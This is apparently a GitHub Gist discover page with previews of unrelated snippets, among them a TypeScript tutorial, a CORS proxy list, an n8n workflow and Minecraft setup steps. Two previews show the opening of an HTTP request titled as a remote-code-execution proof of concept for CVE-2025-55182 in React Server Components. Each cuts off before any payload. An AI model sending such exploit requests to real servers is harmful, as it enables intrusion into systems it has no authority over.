Skip to content

Instantly share code, notes, and snippets.

@maple3142
maple3142 / CVE-2025-55182.http
Last active December 5, 2025 06:26
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@paulmillr
paulmillr / active.md
Last active December 5, 2025 05:52
Most active GitHub users (by contributions). https://paulmillr.com

Most active GitHub users (git.io/top)

The list would not be updated for now. Don't write comments.

The count of contributions (summary of Pull Requests, opened issues and commits) to public repos at GitHub.com from Wed, 21 Sep 2022 till Thu, 21 Sep 2023.

Because of GitHub search limitations, only 1000 first users according to amount of followers are included. If you are not in the list you don't have enough followers. See raw data and source code. Algorithm in pseudocode:

githubUsers
@jinjier
jinjier / javdb-top250.md
Last active December 5, 2025 05:48
JavDB top 250 movies list. [Updated on 2025/11]
@CodeFocusChannel
CodeFocusChannel / YT-Processing.json
Created December 3, 2025 14:20
Turn any YouTuber into an AI agent
{
"name": "YT Processing UPDATED",
"nodes": [
{
"parameters": {
"assignments": {
"assignments": [
{
"id": "eb0d7330-0198-43fa-9a74-6d69d84635b8",
"name": "channel_handle",
@AWolf81
AWolf81 / Universe Of Thoughts Skill
Last active December 5, 2025 05:45
Universe Of Thoughts Skill
We couldn’t find that file to show.
@Dante-dan
Dante-dan / CVE-2025-55182.http
Created December 5, 2025 05:43 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@jimmywarting
jimmywarting / readme.md
Last active December 5, 2025 05:42
Cors proxies
Exposed headers
Service SSL status Response Type Allowed methods Allowed headers
@eimg
eimg / typescript.md
Last active December 5, 2025 06:13
TypeScript - လိုတိုရှင်း

TypeScript - လိုတိုရှင်း

JavaScript ဟာ Dynamic Type Language တစ်ခုပါ။ Data Type တွေကို Language က လိုသလို အလိုအလျှောက် ပြောင်းလဲအလုပ်လုပ်ပေးတဲ့အတွက် ရေးသားသူက Type ကိစ္စ သိပ်ခေါင်းစားနေစရာမလိုဘဲ ရေးစရာရှိတဲ့ကုဒ်တွေကို ခပ်မြန်မြန် ရေးသွားလို့ရပါတယ်။

let value;        // undefined
value = "Alice";  // string
value = 42;       // number
value = true;     // boolean
"use client";
import { animate } from "motion";
import {
motion,
MotionValue,
useMotionTemplate,
useMotionValue,
useTransform,
} from "motion/react";
## How to install MCP for Minecraft Beta 1.7.3
1. Extract MCP zip
2. Copy .minecraft/bin folder into /jars (if old launcher)
For new launcher:
2.1 Find and copy the lwjgl-2.9.0 jar from /libraries of the new launcher to /jars/bin and rename to 'lwjgl.jar'
2.2 Find and copy the lwjgl_util-2.9.0 jar from /libraries of the new launcher to /jars/bin and rename to 'lwjgl_util.jar'
2.3 Find and copy the jinput-2.0.5 jar from /libraries of the new launcher to /jars/bin and rename to 'jinput.jar'
2.4 Extract the natives out of lwjgl-platform-2.9.0-natives-*.jar to /jars/bin/natives